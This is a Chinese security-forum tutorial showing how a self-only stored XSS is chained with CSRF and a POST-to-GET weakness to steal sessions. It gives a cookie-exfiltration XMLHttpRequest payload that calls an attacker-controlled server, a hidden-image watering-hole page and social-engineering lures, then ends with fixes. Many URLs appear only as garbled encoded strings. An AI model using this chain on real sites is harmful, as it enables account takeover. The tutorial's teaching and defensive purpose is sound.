首页
社区
课程
招聘
新手教程:如何利用CSRF执行XSS攻击
发表于: 2016-5-21 15:09 1989

新手教程:如何利用CSRF执行XSS攻击

2016-5-21 15:09
1989
我将拿出最近发生的一个例子,讲解如何将一些低级别的风险连接起来形成一个向量,然后达到攻击的目的。
背景介绍

首先介绍背景条件,我发现一个网站的用户资料页面上有一个持久性XSS漏洞。然而只能是用户修改自己的用户名,针对自己触发XSS。其它用户都不能遇到这个XSS攻击。

看起来难以利用,对不对?我们一般都会这样想,通常认为它只是一个风险,有时候会修复它,但是一般都不会,毕竟无法利用它。

要是能有一个利用办法就好了——幸运的是,这个网站还有两个漏洞,我可以构造一个POC来利用session。
POST转为GET

第一个漏洞是,网站允许将一个POST verb的HTTP请求使用GET verb发送。作为演示,一个POST请求在HTTP请求的body中被发送,比如:

POST /user-config HTTP/1.1

Host: dodgy.evilsite.co.uk

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Cookie: SESSION=abcdef123

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 244firstname=dave&username=tautology

但是,GET请求是在HTTP请求的URL中发送的,比如:

GET /user-config?firstname=dave&username=tautology HTTP/1.1

Host: dodgy.evilsite.co.uk

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Cookie: SESSION=abcdef123

Connection: close

这意味着,如果我们能欺骗服务器使之接受一个GET请求,我们就可以构造一个能够点击执行的URL,比如构造上面的例子:

e62K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8G2k6r3N6&6i4K6u0W2k6i4k6A6L8s2y4A6N6r3g2Q4x3X3g2U0L8#2)9J5k6i4g2C8i4K6u0r3N6i4y4W2M7W2)9J5k6r3y4G2L8X3k6A6k6#2)9K6c8X3k6A6M7Y4y4@1L8X3q4E0k6g2)9K6c8r3c8S2N6X3g2Q4x3U0k6#2M7$3g2J5L8X3q4E0k6g2)9K6c8s2c8S2N6i4c8G2L8r3!0Y4P5b7`.`.

这恰好将我们引向了另外一个漏洞
跨站请求伪造CSRF

    跨站请求伪造(CSRF或者XSRF),最基本的是使用URL和一个已建立的会话,以你的身份替你做一些事情。

让我再更清楚得解释一下。因为HTTP被设计为无状态,比如,每个请求都被认为是一个独立的请求,为了使一个会话能被记住,使用了session cookie,它会在每次请求中传递。

这个方案中,浏览器会替你做所有复杂的工作,如果我有了dodgy.evilsite.co.uk的cookie,浏览器会给发往这个网站的所有请求附带cookie。

这意味着如果我能加入代码,以我构造的URL访问visit dodgy.evilsite.co.uk,就会在他们的权限下执行一些任务。

让对方点击一个URL是简单的,只需要一点社会工程学,这可以通过发送email链接,或者用户常去的论坛链接完成。最简单的实现方式是搭建自己的web服务器,也就是被称作建立“水坑”的战术。

有一个重要的东西挡在我们前面:浏览器的同源策略。这个策略使得如果我们使用复杂的调用,比如 XMLHttpRequest,只能请求相同的域名,或者跨域资源共享(CORS)策略允许的域名。

我们没有目标服务器的CORS策略,所以我们不得不使用稍微低级的技术,比如以image的方式加载页面。<img>HTML标签的一个很好的特性是,它不关注返回的数据是什么,并且浏览器也会忽略它不能理解的内容。

不足之处是我们只能使用GET方法。
结合起来

现在,我们满足下面的条件:

1、可以在客户端的session中执行定制的JavaScript

2、我们能用CSRF漏洞向服务器发送一个定制的GET请求

3、我们可以把POST请求转为GET请求

这些是漏洞利用成功的所有条件。首先要做的事情是创建一个在客户端的session里执行的JavaScript。最好的方法是使用XMLHttpRequest创建一个HTTP请求,带上会话的cookie发往我们控制的服务器。如下:

x=new XMLHttpRequest();x.open(‘GET’,’f82K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2W2N6X3W2D9M7$3W2@1k6g2)9J5k6h3y4G2i4K6u0W2N6h3E0Q4x3V1k6Q4c8e0u0Q4z5o6m8Q4z5e0W2Q4x3V1u0V1L8$3y4#2L8h3g2F1N6q4)9J5k6h3y4G2L8$3E0A6k6g2)9J5b7$3k6S2L8s2y4W2i4K6t1&6i4K6y4n7P5q4)9J5k6i4y4W2L8X3c8Q4x3U0S2Q4x3U0W2Q4x3@1t1`.

我们需要在用户不知情的情况下进行攻击,所以我们把它放到XSS漏洞利用代码中。

f6fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6V1L8$3c8Y4P5g2)9J5k6h3g2$3K9h3I4K6K9i4c8W2i4K6u0W2j5$3!0Q4x3X3g2#2K9#2)9J5c8Y4g2K6k6i4u0Q4x3X3c8U0L8$3&6X3K9h3N6Q4x3@1k6X3L8%4u0E0i4K6u0V1k6X3W2J5M7%4c8F1j5h3#2W2i4K6y4p5c8r3q4$3k6g2)9J5y4e0t1%4i4K6u0n7i4K6t1#2x3V1k6Q4x3U0f1K6c8g2)9J5y4e0y4o6M7$3y4J5K9i4m8@1i4K6t1#2x3@1g2^5i4K6y4p5L8X3g2%4i4K6t1$3L8X3u0K6M7q4)9K6b7W2S2y4e0p5S2@1N6s2m8d9k6i4q4#2k6i4y4@1i4K6t1^5i4K6t1&6i4K6y4n7P5q4)9J5k6h3!0H3k6h3&6Q4x3U0S2Q4c8e0u0Q4z5o6m8Q4z5e0S2s2c8g2c8Q4c8e0u0Q4z5o6m8Q4z5e0W2Q4x3V1y4Q4c8e0u0Q4z5o6m8Q4z5e0W2Z5N6s2c8H3M7#2)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2$3K9h3I4K6K9i4c8W2i4K6u0W2j5$3!0Q4x3X3g2#2K9#2)9J5c8W2!0q4x3W2)9^5x3q4)9&6z5g2)9J5y4e0u0T1k6r3!0U0N6h3#2W2L8Y4c8Q4x3X3g2U0L8$3!0C8K9h3g2Q4x3V1y4X3j5h3I4K6k6g2)9J5z5g2)9K6b7Y4S2Q4x3X3g2K6k6h3&6V1i4K6t1^5i4K6t1&6i4K6y4n7i4K6t1$3L8s2c8Q4x3@1u0Q4x3V1k6K6j5%4u0A6M7s2c8Q4x3U0k6Y4N6q4)9K6b7W2)9J5y4X3I4@1i4K6y4n7k6r3W2$3i4K6t1$3L8X3u0K6M7q4)9K6b7X3W2V1i4K6y4p5i4@1f1J5i4K6R3H3i4K6V1&6

末尾的 <div id=’是为了保证在XSS攻击后掩盖剩下的HTML,这样就不会留下任何可疑的痕迹。

我们将会把它放到一个水坑网站上,作为一个image来加载,只需要用再增加一些基本的内容就可以将之放进去。

因此,我们的第一个任务是创建一个简单的没有漏洞利用代码的web页面。为此,我借用了xkcd(49fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2C8j5$3c8Q4x3X3g2U0L8$3#2Q4x3V1j5#2y4U0g2Q4x3V1k6Q4x3U0W2Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0k6Q4b7V1y4Q4b7f1u0Q4c8e0N6Q4z5e0c8Q4b7V1u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4z5f1u0Q4b7e0m8Q4c8e0c8Q4b7U0S2Q4b7V1q4Q4c8e0S2Q4b7V1k6Q4z5e0W2Q4c8e0c8Q4b7U0S2Q4b7f1q4Q4c8e0W2Q4b7e0q4Q4b7U0g2Q4c8e0W2Q4z5f1c8Q4b7e0u0Q4c8e0g2Q4b7e0c8Q4z5o6c8Q4c8e0c8Q4b7V1q4Q4z5p5g2Q4c8e0N6Q4z5f1k6Q4b7e0g2Q4c8e0S2Q4b7f1k6Q4z5o6k6Q4c8e0g2Q4z5o6g2Q4b7U0q4Q4c8e0c8Q4b7V1q4Q4b7f1u0Q4c8e0N6Q4b7V1c8Q4b7U0u0Q4c8e0g2Q4z5e0m8Q4z5p5c8Q4c8e0S2Q4b7f1g2Q4b7U0S2Q4c8e0g2Q4z5p5k6Q4b7f1k6Q4c8e0g2Q4z5p5c8Q4z5p5k6Q4c8e0S2Q4b7f1g2Q4b7f1g2Q4c8f1k6Q4b7V1y4Q4z5o6S2U0M7X3g2S2N6r3W2$3k6g2)9J5y4X3&6T1M7%4m8Q4x3@1u0U0L8$3#2E0L8$3&6K6i4K6t1$3L8X3u0K6M7q4)9K6b7X3q4@1N6s2u0A6j5Y4g2@1K9h3!0F1i4K6t1$3L8X3u0K6M7q4)9K6b7X3I4A6j5$3g2F1j5$3g2Q4c8f1k6Q4b7V1y4Q4z5o6W2Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0S2Q4b7f1g2Q4b7U0S2Q4c8e0g2Q4z5p5k6Q4b7f1k6Q4c8e0c8Q4b7U0W2Q4z5p5u0Q4c8e0c8Q4b7U0S2Q4z5p5u0Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0k6Q4z5o6S2Q4z5e0q4Q4c8e0g2Q4z5p5k6Q4b7f1k6Q4c8e0c8Q4b7V1u0Q4b7e0g2Q4c8e0c8Q4b7V1c8Q4b7V1k6Q4c8e0N6Q4z5e0c8Q4b7e0S2Q4c8e0g2Q4b7f1g2Q4z5o6y4Q4c8e0y4Q4z5o6m8Q4z5o6t1`.

下面是我的网站:

<html><p>Whilst you’re reading this cartoon, I’m compromising your account.</p>

<img src=”security_question.png” />

 

<img style=”visibility: hidden” src=”190K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6V1L8$3c8Y4P5g2)9J5k6h3g2$3K9h3I4K6K9i4c8W2i4K6u0W2j5$3!0Q4x3X3g2#2K9#2)9J5c8Y4g2K6k6i4u0Q4x3X3c8U0L8$3&6X3K9h3M7`.

/?form-firstname=Dave%27+%2F%3E%3Cscript%3Ex=new XMLHttpRequest();x.open(‘GET’,’

497K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2W2N6X3W2D9M7$3W2@1k6g2)9J5k6h3y4G2i4K6u0W2N6h3E0Q4x3V1k6Q4c8e0u0Q4z5o6m8Q4z5e0W2Q4x3U0f1J5j5X3c8G2j5%4g2E0k6h3&6@1i4K6u0W2j5$3!0G2K9$3W2W2i4K6u0o6k6X3q4D9M7$3g2Q4x3U0W2Q4x3@1u0^5i4K6u0W2M7$3g2F1k6q4)9J5z5q4)9J5z5g2)9K6b7W2)9J5y4X3I4@1i4K6y4n7i4K6u0r3M7$3y4J5K9i4m8@1i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0k6D9N6q4)9K6b7X3c8A6N6W2)9J5y4X3&6T1M7%4m8Q4x3@1u0A6k6q4)9K6c8q4)9J5y4#2!0q4x3W2)9^5x3q4)9&6c8q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1k6Q4x3U0k6Y4N6q4)9K6b7R3`.`.

 

</html>

关键是那个我设为隐藏的<img>标签

XSSCSRF1.png

这样,我想办法让对方访问这个网站,网站会访问我嵌入的URL,这个URL会执行XSS攻击,这样当下次用户访问页面时(这也可以通过社会工程学实现),用户就会被攻击,他们的session信息会发送到我的账户。

XSSCSRF2-1.png

(图像经过处理了,但是你可以了解其思想)
结论

我展示了,通过一点努力(也包括一些社会工程学)可以让一个传统方式下无法利用的漏洞在使用其它的漏洞之后被利用。

如何修复它?有下面几步:

    1、确保检查了所有的不可信数据,不管它将显示在哪儿以及显示给谁。

    2、在关键的表单上使用CSRF token,比如密码改变,最大限度降低CSRF的风险。

    3、只通过POST HTTP方法接收重要的表单。

    4、适当的安全教育,让人们知道不要随便点击可疑的链接。

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回